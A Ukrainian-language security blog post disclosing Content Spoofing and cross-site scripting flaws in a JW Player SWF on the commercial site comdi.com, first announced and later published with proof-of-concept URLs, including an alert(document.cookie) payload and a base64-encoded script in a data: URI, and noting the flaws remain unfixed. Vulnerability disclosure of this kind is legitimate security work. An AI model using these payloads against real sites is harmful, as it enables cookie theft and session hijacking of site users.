Websecurity - Веб безпека

27.12.2012

У листопаді, 22.11.2012, я знайшов Content Spoofing та Cross-Site Scripting уразливості на комерційному проекті http://www.comdi.com. Про що вже сповістив адміністрацію сайта.

Стосовно дірок на e-commerce сайтах та сайтах електронних платіжних систем в останнє я писав про уразливості на www.payu.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.04.2013

Content Spoofing:

http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=http://site

XSS:

http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?playerready=alert(document.cookie)
http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Та інші Content Spoofing та Cross-Site Scripting уразливості в JW Player.

Дані уразливості досі не виправлені.

This entry was posted on 23:52 24.04.2013 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.